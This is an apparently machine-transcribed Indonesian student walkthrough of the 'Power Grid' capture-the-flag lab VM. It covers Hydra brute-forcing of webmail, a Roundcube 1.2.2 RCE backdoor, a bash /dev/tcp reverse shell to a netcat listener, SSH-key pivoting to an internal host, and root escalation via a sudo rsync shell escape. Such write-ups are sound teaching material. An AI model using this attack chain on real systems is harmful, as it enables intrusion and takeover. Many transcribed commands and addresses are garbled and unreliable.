gunzip itu tool untuk dekompresi file dengan format gzip. Terus ya ini path dari file word list yang mau kita unzip. Nah, seperti yang tadi aku udah bilang, jadi rockyou ini isinya password yang telah bocor dari berbagai data breach. Jadi ini baru passwordnya. Sedangkan untuk username-nya kita bakal pakai username dari masing-masing anggota dari Simuru1 hacking team ini. Mungkin karena ini agak lama, jadi mungkin aku bakal langsung pakai aja yang P48. Untuk itu kita balik dulu ke directory home dan kita bakal buat file users.txt yang akan memuat username yang akan kita gunakan untuk
brute force. Untuk membuat file itu menggunakan command touch users.txt. Terus untuk mengeditnya kita akan menggunakan nano. Dan di sini udah ada ya P48. Dan untuk save-nya itu akan menggunakan Ctrl X dan Y kalau kalian ada perubahan. Y dan enter. Kemudian menggunakan Hydra kita akan menggunakan komen berikut bsr share word list rocky.txt strip f 19.180.144 ttp get /setmail. Oke, jadi penjelasan singkat. Hydra merupakan tool untuk brute force proses login pada berbagai protokol dan layanan, dan strip L merupakan flag untuk menentukan file yang berisi daftar username, dan strip P merupakan flag untuk menentukan file yang berisi daftar password. Strip F kecil merupakan flag untuk menghentikan proses setelah menemukan pasangan username dan password yang valid. Dan selanjutnya ada IP dari target yang kita tuju, yaitu VM Power Grid. Dan selanjutnya ada http strip get spasi /email, yaitu argumen untuk menentukan protokol, metode, dan path tujuan yang digunakan. Oke, di sini bisa dilihat sudah selesai brute force-nya. Jadi hasilnya adalah kita menemukan kalau username-nya P48 dan passwordnya adalah Electrico. Langsung saja kita coba login ke Zmail tadi. P48 dan Electrico. Berhasil. Kemudian kita dihadapkan pada halaman login dengan pertanyaan yang sama, yaitu username dan password. Namun kali ini ada tambahan logo round cube di atasnya. Kita coba saja masukkan username dan password yang sama, P48 dengan password Electrico. Benar saja, kita berhasil masuk ke webmail Roundcube dan menemukan satu email di sana. Di sini isinya listen carefully, we are close to our attack date. Nothing is going to stop us now. Our malware is heavily planted in each power grid across Europe. All it takes is a signal from the server after the timer has stopped. And nothing is going to stop that now. For information, I have set up a backup server located on the same network. You shouldn't need to access it for now, but if you do, scan for its local IP and use the SSH key encrypted below. It is encrypted with your GPG key, by the way. The backup server has root access to this main server, and if you need to make any backups, I will leave it for you to work out how. I haven't got time to explain. We are too close to launching our hack. Dan di bawahnya ada PGP message. Ini emailnya dari root@powergrid pada tanggal 19 Mei 2020 jam 15.24. Selanjutnya mungkin kita sedikit eksplorasi tentang Roundcube ini. Jadi kalau kita klik pada about di sini, kita bisa menemukan kalau versi Roundcube webmail yang digunakan adalah versi 1.2.2. Yang kalau kita cari menggunakan search exploit, ini ditemukan kalau versi Roundcube 1.2.2 itu vulnerable atau rentan terhadap celah RCE atau Remote Code Execution. Oh ya, mungkin sedikit penjelasan. Jadi search exploit merupakan tool dari exploit database atau EDB untuk mencari eksploitasi shellcode dan proof of concept yang tersedia di EDB. Dan Roundcube sendiri merupakan nama target yang dicari di EDB. Kemudian karena ditemukan kalau ada vulnerability atau celah, kemudian kita cari saja detail dari exploit yang bisa dilakukan dengan cara search exploit, strip X, dan path dari exploit yang akan kita cari, yaitu php/webapps/40892.txt. Dari sini ada penjelasan detailnya yang kalau kita baca untuk scroll menggunakan arrow key bawah ya.
pada proof of concept-nya, jadi saat email dikirim menggunakan Roundcube, HTTP request-nya itu bisa di-intercept dan bisa diubah dengan memodifikasi parameter underscore from untuk menambahkan malicious PHP file on the system atau backdoor. Dan di situ juga ada penjelasannya. Jadi karena data email itu tidak di-encode, jadinya kan tetap plain text tuh, teks biasa. Jadi kita bisa modify dan itu tuh allows the injection of PHP text into the shell file. Kemudian kita coba saja untuk memasang backdoor dengan menggunakan script yang telah dibuat oleh orang lain di GitHub. Jadi di sini kita akan copy isi dari file exploit.py-nya. Ke exploit.py. Mungkin akan saya peragakan saja pembuatan dari exploit.py tadi. Jadi saya hapus terlebih dahulu file yang sudah ada dan menggunakan nano kembali dan tinggal kopas saja isinya. Kemudian gunakan Ctrl X untuk keluar dan ya save modified buffer, tekan Y dan dalam turat exploit.py tekan enter saja. Selesai. Exploit.py berhasil disimpan dan tinggal kita jalankan saja dengan menggunakan command Python 3 exploit.py strip host. Tadi username-nya p48, passwordnya Electrico, IP-nya 192.168.0144, strip user p48, strip pwd Electrico, strip path slash zmail, strip www_path. Terus kita mau naruh backdoor di mana? Di sini kita akan menaruh backdoor di path/zmail. Mungkin sedikit penjelasan singkat. Jadi tadi Nano itu merupakan text editor berbasis terminal. Terus Python 3 ini command untuk menjalankan script Python, dan flag strip host itu argumen untuk menentukan host target, dan p48.2 Electrico @192.168.0144 itu kombinasi dari username, password, dan alamat IP target untuk autentikasi, dan strip user untuk menentukan username-nya, strip pwd untuk menentukan password-nya, dan strip path untuk menentukan path pada server target, dan flag strip www_path itu argumen untuk menentukan path directory webroot di server target. Kemudian backdoor berhasil terpasang dan target exploited. Maka kita tinggal akses saja pada IP tadi dan tambahkan zmail /backdoor.php. Oke, berhasil masuk. Artinya kita sudah berhasil mengakses CLI dari VM Power Grid dengan menggunakan username p48. Sebenarnya ini sama saja dengan apabila kita melakukan login manual menggunakan CLI Power Grid ini, tapi lebih fleksibel aja. Karena contohnya di sini kita bisa melakukan ls. Jadi di ls di zmail ini ada changelog, install, license, readme, skill upgrading, backdoor PHP, bin, dan lain-lain. Dan kalau kita coba cari di root, dia itu ada bin, boot, dev, etc, home, initrd.image, dan lain-lain. Terus mungkin kita cek aja di var, mungkin di home dari webnya. Terus ternyata di sini ada flag 1.txt. Oke, langsung saja. Kalau udah menemukan lokasinya, kita langsung saja menggunakan cat untuk melihat isi dari suatu file. var www flag 1.txt, dan di sini kita menemukan flag yang pertama, yaitu vbd 5cd 83c 33d
2022 CE012 D1 A36 C27AE dengan penjelasan well done getting flag 1. Are you any good at pivoting? Flag 1 berhasil didapat. Kemudian kita coba saja untuk melihat ada apa sih di home dari si P48 ini. Dan di sini tidak terlihat apa-apa. Jadi sepertinya backdoor ini tidak berhasil untuk melihat home dari si P48 ini. Jadi langsung saja kita coba login di VM Power Grid-nya langsung. Kita pakai username tadi P48, password Electrico, berhasil masuk. Dan itu di home ya, di home-nya P48. Dan jika kita ls untuk melihat directory dan file apa saja yang ada, maka kita mendapatkan file bernama privkey.jpg yang merupakan private key JPG kita. Ini sesuai dengan email yang tadi kita baca. Jadi kita akan menggunakan kredensial tadi privkey.jpg untuk menentukan message apa sih yang terenkripsi di sini. Karena di sini tulisannya ini terenkripsi dengan JPG kita. Jadi kita bisa mendecode dengan menggunakan JPG kita juga. Oke, langsung saja kita coba cat untuk melihat isi dari privkey.jpg. Ini isinya panjang. Kemudian karena saya tidak bisa menggunakan scroll mouse saya untuk melakukan copy paste dari privkey.jpg ini, maka saya akan menggunakan cara lain untuk mengakses privkey.jpg ini dengan cara reverse shell menggunakan port 443. Caranya adalah sebagai berikut. Pada terminal VM kali, masukkan perintah nc-nlfp 443 untuk membuka port 443 dan listening. Kemudian pada backdoor kita masukkan perintah baru yaitu bash strip c kutip 2 bash strip i lebih dari n /deftcp 92.168.0 terus IP dari kali kita yaitu 106 portnya yaitu 443 dan 0 lebih dari N1. Jangan lupa ubah N menjadi %26. Oke, berhasil connect. Tapi di sini kita bisa melihat kalau inappropriate IO control for device. Tapi biarin aja. Terus mungkin sedikit penjelasan. Jadi tadi bash strip c ini maksudnya kita akan menjalankan komen berikutnya, yaitu yang dalam kutip ini, dalam konteks shell yang baru. Kemudian jika kita bedah, maka bash strip ini akan memulai bash shell yang interaktif, yaitu ini. Dan lebih dari n/dev/tcp dan seterusnya sampai 443 itu adalah untuk mengarahkan standard output atau stdout dan standard error atau stdr ke koneksi TCP yang dibuka ke 192.168.0.106 atau IP dari VM kali kita dengan port 443. Jadi outputnya nanti akan diarahkan ke situ. Juga untuk yang kedua yaitu 0 lebih dari N1 itu untuk mengarahkan standar inputnya untuk membaca dari standard out sehingga memungkinkan interaksi penuh melalui koneksi TCP tersebut. Kemudian penjelasan dari nc-nlfp 443 ini, jadi NC merupakan singkatan dari netcat atau tools jaringan serbaguna yang dapat digunakan untuk membaca dan menulis data melalui koneksi jaringan menggunakan protokol TCP atau UDP, dan NLFP merupakan masing-masingnya merupakan flag yang bisa berdiri sendiri, dengan N merupakan flag untuk tidak melakukan resolusi nama host atau layanan, L merupakan flag untuk listen atau mendengarkan koneksi yang masuk, V merupakan flag untuk bekerja dalam mode verbose untuk keperluan debugging, dan P
yaitu flag untuk menggunakan port tertentu, yaitu 443 di sini. Setelah berhasil masuk menggunakan port 443, kami langsung login kembali menggunakan kredensial P48 dengan komen su P48. Passwordnya Electrico. Kemudian karena entah kenapa shell promptnya menghilang. Di sini sebelumnya kan ada awalannya ya. Ini tuh namanya shell prompt dan ini menghilang sekarang. Kita coba enter, ya menghilang. Jadi kita bisa menggunakan komen ini untuk memunculkannya kembali. Python strip C kutip import pty titik koma pty.spawn kurung terus petik lagi /bin/bash titik tutup. Nah, oke, kemudian sudah muncul lagi. Oke, shell promptnya sudah kembali dan di sini kita bisa menggunakan perintah cat untuk melihat lagi isi file privkey.jpg. Kita langsung saja cat home p48 terus jadi nama filenya privkey.jpg. Oke, dari sini kita copy. Oh ya, yang di copy itu dari strip-stripnya juga ya, yang footernya ini juga ikut, headernya juga ikut dari begin. Gunakan Ctrl Shift C untuk copy. Terus di sini kita buka pgptool.org. Itu merupakan tool online untuk melakukan encode dan decode PGP key. Di sini kita gunakan yang decrypt. Private key-nya, terus passphrase-nya tentu saja tadi Electrico, dan encrypted message-nya bisa dilihat pada email. Ini juga sama, jadi header dan footer dari message-nya juga ikut di copy. Dan langsung saja kita decrypt. Oke, pesannya berhasil didekripsi. Dan pada header, kita bisa melihat kalau pesan tadi itu berisi OpenSSH private key. Nah, OpenSSH di sini dari email yang tadi kita baca, itu harusnya akan terhubung dengan backup server yang ada di network yang sama. Oleh karena itu, maka digunakan OpenSSH private key. Dan langsung saja kita copy pesan yang telah didekripsi ini. Kemudian kita simpan pada VM Power Grid. Kita akan pergi dulu ke home dari si P48. Kita akan buat file baru dengan nama touch id rsa. Oke, sudah ada filenya di _rsa. Kemudian kita akan menggunakan nano untuk mengisi file tersebut. Oke, di sini kita melihat error opening terminal unknown. Karena errornya tidak jelas, maka kita akan menggunakan cara lain, yaitu menggunakan vim untuk mengubah isi dari file id_rsa. Vim ini sama seperti nano, jadi dia text editor berbasis terminal. Mari kita coba saja vid_rsa. Oh ya, vim ini komennya v atau singkatan dari visual interface. Oke, terus seperti biasa Ctrl Shift V untuk kopas. Di sini mungkin sedikit hancur isinya, tapi biarkan saja. Untuk save-nya kita akan menggunakan ESC atau escape. Kemudian kita tekan *2 W Q dan enter. Oke, berhasil. Terus kalau kita cek menggunakan cat, oke, OpenSSH private key berhasil tertulis di id_rsa. Tapi jika kita melihat pada headernya, ada beberapa karakter yang hilang, yaitu strip dan begin. Ini tinggal n saja. Karena ada yang hilang, maka kita ulangi, kita hapus lagi filenya dengan menggunakan rm atau singkatan dari remove. Kita gunakan v lagi. Sebelum kita kopas, menggunakan Ctrl Shift V, kita ketik dulu strip sampai begin manual.
kita ketik dulu strip sampai begin dengan manual. Di sini kita bisa melihat kalau sebelum begin itu ada 5 strip. Jadi strip begin, baru kita Ctrl Shift V untuk lepas. Dan sama seperti tadi, cara kita save-nya yaitu menggunakan escape -2 WQ dan enter. Coba kita lihat lagi isinya. Oke, isinya sudah benar. Kemudian bagaimana cara kita menggunakan OpenSSH Private Key ini? Jika kita melihat pada email, backup server tersebut berada di lokasi network yang sama. Maka caranya adalah dengan menggunakan hostname strip i. Oh ya, mungkin tadi terlewat. Jadi hostname adalah komen untuk menampilkan atau mengatur hostname dari sistem, dan strip i sendiri merupakan flag untuk menampilkan semua alamat IP jaringan, baik itu IPv4 dan IPv6 yang terkait dengan hostname. Jadi seperti yang tadi sudah diketahui, 192.168.144 merupakan IP dari power grid-nya, dan 172.17.01 merupakan IP dari power grid juga, tetapi di subnet yang berbeda. Yaitu ini subnet internal yang mungkin saja terhubung dengan si backup server tadi. Kemudian sebenarnya kita bisa menggunakan nmap atau yang lain untuk melihat ada IP apa saja pada subnet tersebut. Tapi karena subnet ini kecil, jadi kita gunakan saja ping untuk menembak sebuah IP yang hanya berbeda 1 digit dari IP VM power grid kita, yaitu 172.17.0 yang angka akhirnya ditambahkan dengan 1, yaitu dari yang awalnya 1 menjadi 2. Dan benar saja, ternyata ada server yang terhubung dengan IP 172.17.02. Oleh karena itu, saya mencurigai bahwa IP tersebut merupakan server backup yang sedang kita cari. Langsung saja kita coba menggunakan SSH untuk connect ke server tersebut. Masukkan komen 172.17.02 dengan menggunakan OpenSSH Private Key yang kita sudah tulis tadi, yaitu ID_RSA. Oh, terminalnya tertutup. Kita coba lagi buka port 443 dan kita reload. Dan kita coba lagi menggunakan SSH 172.17.02 dengan private key ID_RSA. Oke, di sini kita bisa melihat kalau permissionnya 0644. Ini permission default yang dibuat oleh user P48, dan ini terlalu open, jadi tidak bisa digunakan untuk melakukan SSH. Oleh karena itu kita harus mengubahnya dulu menggunakan chmod, yaitu merupakan singkatan dari change mode, yang merupakan komen untuk mengubah izin akses file atau directory. Kita langsung saja ketikkan chmod. Oh, ini ada password. Oke, sudah keluar. Langsung saja kita ketikkan chmod menjadi 600 ID_RSA. Oh iya, maksudnya 0644 itu berarti file tersebut dapat dibaca oleh semua anggota grup. Dan oleh karena itu kita harus mengubah 2 digit terakhirnya dari yang tadi awalnya 44 menjadi 00 dengan menggunakan chmod. Langsung saja. Oke, sudah berhasil kita ubah. Kita ulangi proses SSH-nya 172.17.02 dengan menggunakan private key ID_RSA. Oke, berhasil login ke backup server, tapi di sini kita masih menggunakan kredensial P48, belum root. Kita coba saja ls untuk melihat home dari si P48 ini, dan di sini kita bisa melihat kalau kita menemukan flag yang kedua yang berisi 047 DDCD 1F33 DFB 7D80 DA3CE 04E89 DF73 dengan teks tambahan berupa well done for getting flag 2.
It looks like this user is fairly unprivileged. Oke, karena itu kita coba untuk escalating privilege. Kita perlu melihat apakah si P48 ini memiliki akses ke root dengan menggunakan sudo strip L. Strip L ini merupakan flag untuk menginstruksikan sudo untuk menampilkan daftar perintah yang diizinkan dan pembatasan yang berlaku untuk user saat ini. Jika kita melihat pada rsync di sini, kita bisa menyimpulkan kalau P48 dapat melakukan privilege escalation menjadi root dengan menggunakan rsync tersebut. Perintahnya adalah sebagai berikut: sudo rsync strip e kutip sh strip c kutip sh 0 kurang dari n2 1 lebih dari n2 127.001.2/dev/0. Jadi rsync sendiri merupakan tool untuk mentransfer dan mensinkronkan file dan direktori antara dua lokasi. Kemudian flag E yaitu untuk menggunakan perintah shell custom, dan sh strip c merupakan keyword untuk menjalankan perintah shell yang berada pada kutip setelahnya. Kemudian sh 0 kurang dari n2 1 lebih dari n2 itu merupakan perintah yang dijalankan yaitu untuk mengalihkan standar input dan standar output ke standar error. Kemudian 127.001 merupakan alamat IP loopback yang mengarah ke komputer lokal. Artinya komen ini beroperasi pada mesin yang lokal. Kemudian ada juga path /dev/null. Ini merupakan perangkat khusus yang membuang semua data yang ditulis ke dalamnya. Sering digunakan untuk mengabaikan output yang tidak diinginkan. Ternyata benar, P48 dapat melakukan privilege escalation menjadi root dengan menggunakan rsync. Kemudian, jika kita melihat pada direktorinya, kita masih berada di direktori yang sama. Setelah menjadi root, maka kita bisa melihat direktori dari root VM Power Grid. Dan jika kita melihat isinya, kita bisa mengetahui kalau ada flag 3 di sini. Langsung saja kita lihat menggunakan cat. Jadi flag 3-nya adalah 009 A4DD F6CB DD 781 C3513 DA 0F 77 AA nama 2 dengan pesan well done for getting the third flag. Are you any good at pivoting backwards? Jadi seperti yang dilihat di sini ada keyword pivoting. Maka kemungkinan besar flag yang keempat ada di VM utama. Kali ini kita akan SSH kembali, tapi menggunakan root ke VM utama dari si Power Grid. Karena tadi IP dari si backup servernya adalah 172.17.02, maka VM Power Grid memiliki IP 172.17.01. Oke, berhasil. Rootnya berhasil didapat. Kemudian langsung saja kita melihat ada direktori root. Oh, ternyata ada flag 4 di sini. Mari kita coba saja lihat isinya. Oke, di sini kita mendapatkan flag yang keempat, yaitu F5 AFAF 46EDE 1DD 5DE 76EAC 1876C 60 130 dengan pesan congratulations, this is the fourth and final flag. Jadi ini yang terakhir, flag yang terakhir, dan make sure to delete /var/www/html/starttime.txt untuk menghentikan attack-nya. Mungkin kita akan membutuhkan komen chatter terlebih dahulu. Oke, kita coba saja. Kita akan menghapus starttime.txt. Oh, maaf, salah. rm var www.html/starttime.txt. Jadi di sini kita bisa lihat kalau operation not permitted. Mungkin kita coba jalankan komen yang tadi. Komen yang diberikan. Oke, terus kita ulangin. rm var www.html/starttime.txt. Oke, berhasil terhapus. Dan kalau kita lihat pada webnya, maka timernya akan terreset kembali jadi 180. Oke, sekian dari saya, dan mungkin ini juga sebagai penutup dari penjelasan hacking kelompok kami, yaitu kelompok T. Perkenalkan kembali, saya
Saya Rizky Arifin dengan NIM 182211048, Hilmi Baskara Radanto dengan NIM 182211072, dan Fakri Putra Mardika dengan NIM 1822180. Assalamualaikum warahmatullahi wabarakatuh.